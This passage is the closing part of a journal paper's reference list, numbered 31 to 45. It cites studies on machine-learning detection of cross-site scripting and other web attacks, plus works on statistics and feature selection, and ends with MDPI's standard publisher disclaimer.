31. Gupta, C.; Singh, R.K.; Mohapatra, A.K. GeneMiner: A Classification Approach for Detection of XSS Attacks on Web Services.
Comput. Intell. Neurosci. 2022, 2022, 3675821. [CrossRef]
32. Dawadi, B.R.; Adhikari, B.; Srivastava, D.K. Deep Learning Technique-Enabled Web Application Firewall for the Detection of
Web Attacks. Sensors 2023, 23, 2073. [CrossRef]
33. Tian, Z.; Luo, C.; Qiu, J.; Du, X.; Guizani, M. A Distributed Deep Learning System for Web Attack Detection on Edge Devices.
IEEE Trans. Ind. Inf. 2020, 16, 1963–1971. [CrossRef]
34. Chaudhary, P.; Gupta, B.B.; Chang, X.; Nedjah, N.; Chui, K.T. Enhancing big data security through integrating XSS scanner into
fog nodes for SMEs gain. Technol. Forecast. Soc Chang. 2021, 168, 120754. [CrossRef]
35. Luo, C.; Tan, Z.; Min, G.; Gan, J.; Shi, W.; Tian, Z. A Novel Web Attack Detection System for Internet of Things via Ensemble
Classification. IEEE Trans. Ind. Inf. 2021, 17, 5810–5818. [CrossRef]
36. Odun-Ayo, I.; Toro-Abasi, W.; Adebiyi, M.; Alagbe, O. An implementation of real-time detection of cross-site scripting attacks on
cloud-based web applications using deep learning. Bull. Electr. Eng. Inform. 2021, 10, 2442–2453. [CrossRef]
37. Lei, L.; Chen, M.; He, C.; Li, D. XSS Detection Technology Based on LSTM-Attention. In Proceedings of the 2020 5th International
Conference on Control, Robotics and Cybernetics, CRC 2020, Wuhan, China, 16–18 October 2020; Institute of Electrical and
Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020; pp. 175–180. [CrossRef]
38. Tan, X.; Xu, Y.; Wu, T.; Li, B. Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method. Appl. Sci. 2023, 13, 7895.
[CrossRef]
39. Zhang, X.; Zhou, Y.; Pei, S.; Zhuge, J.; Chen, J. Adversarial Examples Detection for XSS Attacks Based on Generative Adversarial
Networks. IEEE Access 2020, 8, 10989–10996. [CrossRef]
40. Alaoui, R.L.; Nfaoui, E.H. Generative Adversarial Network-Based Approach for Automated Generation of Adversarial Attacks
Against a Deep-Learning Based XSS Attack Detection Model. 2023. Available online: www.ijacsa.thesai.org (accessed on
13 June 2024).
41. Tariq, I.; Sindhu, M.A.; Abbasi, R.A.; Khattak, A.S.; Maqbool, O.; Siddiqui, G.F. Resolving cross-site scripting attacks through
genetic algorithm and reinforcement learning. Expert Syst. Appl. 2021, 168, 114386. [CrossRef]
42. Thajeel, I.K.; Samsudin, K.; Hashim, S.J.; Hashim, F. Dynamic feature selection model for adaptive cross site scripting attack
detection using developed multi-agent deep Q learning model. J. King Saud Univ.—Comput. Inf. Sci. 2023, 35, 101490. [CrossRef]
43. Van Den Bergh, D.; van Doorn, J.; Marsman, M.; Draws, T.; van Kesteren, E.-J.; Derks, K.; Dablander, F.; Gronau, Q.F.; Kucharský,
Š.; Gupta, A.R.K.N.; et al. A tutorial on conducting and interpreting a bayesian ANOVA in JASP. Annee Psychol. 2020, 120, 73–96.
[CrossRef]
Information 2024, 15, 420 20 of 20
44. Omuya, E.O.; Okeyo, G.O.; Kimwele, M.W. Feature Selection for Classification using Principal Component Analysis and
Information Gain. Expert Syst. Appl. 2021, 174, 114765. [CrossRef]
45. Khyat, J.; Chitra, S. Feature Selection Methods for Improving Classification Accuracy-A Comparative Study. UGC Care Group I
Listed J. 2020, 10, 1.
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual
author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to
people or property resulting from any ideas, methods, instructions or products referred to in the content.